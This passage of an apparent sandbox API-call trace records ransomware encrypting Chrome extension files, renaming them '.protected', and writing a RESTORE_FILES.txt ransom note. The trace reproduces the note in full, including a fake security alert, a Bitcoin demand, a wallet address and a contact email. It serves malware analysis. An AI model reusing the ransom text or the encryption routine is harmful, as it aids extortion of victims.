2018") returned 177 [0083.401] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.401] CloseHandle (hObject=0x164) returned 1 [0083.401] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.401] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0083.401] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0083.401] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0083.401] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0083.401] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0083.401] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs") returned 150 [0083.401] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0083.401] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0083.401] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\*") returned 152 [0083.401] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.401] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.401] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.401] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.401] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.401] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.401] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\.") returned 152 [0083.401] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.401] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.402] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.402] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.402] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.402] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.402] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.402] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\..") returned 153 [0083.402] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.402] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.402] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.402] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.402] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.402] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.402] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.402] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.402] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json") returned 164 [0083.402] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.402] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.402] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.402] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.403] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json") returned 164 [0083.403] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.403] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json") returned 164 [0083.403] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.403] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json") returned 164 [0083.403] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.403] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.405] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.405] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.405] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.406] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.406] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.406] CloseHandle (hObject=0x168) returned 1 [0083.406] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.protected") returned 174 [0083.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.protected")) returned 1 [0083.407] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.407] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.407] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\RESTORE_FILES.txt") returned 168 [0083.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.408] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.408] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.409] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.409] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.409] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.409] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.409] CloseHandle (hObject=0x164) returned 1 [0083.409] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.409] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0083.409] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0083.409] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0083.409] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0083.409] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0083.409] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da") returned 150 [0083.409] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0083.409] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0083.409] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\*") returned 152 [0083.409] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.410] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.410] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.410] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.410] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.410] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.410] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\.") returned 152 [0083.410] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.410] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.410] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.410] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.410] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.410] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.410] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.410] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\..") returned 153 [0083.410] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.410] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.410] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.410] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.410] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.410] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.410] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.410] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.410] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json") returned 164 [0083.410] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.410] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.410] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.410] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.412] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json") returned 164 [0083.412] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.412] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json") returned 164 [0083.412] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.412] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json") returned 164 [0083.412] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.412] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.416] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.416] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.417] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.417] CloseHandle (hObject=0x168) returned 1 [0083.417] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.protected") returned 174 [0083.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.protected")) returned 1 [0083.418] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.418] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.418] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\RESTORE_FILES.txt") returned 168 [0083.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.418] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.418] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.419] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.419] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.419] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.419] WriteFile (in: 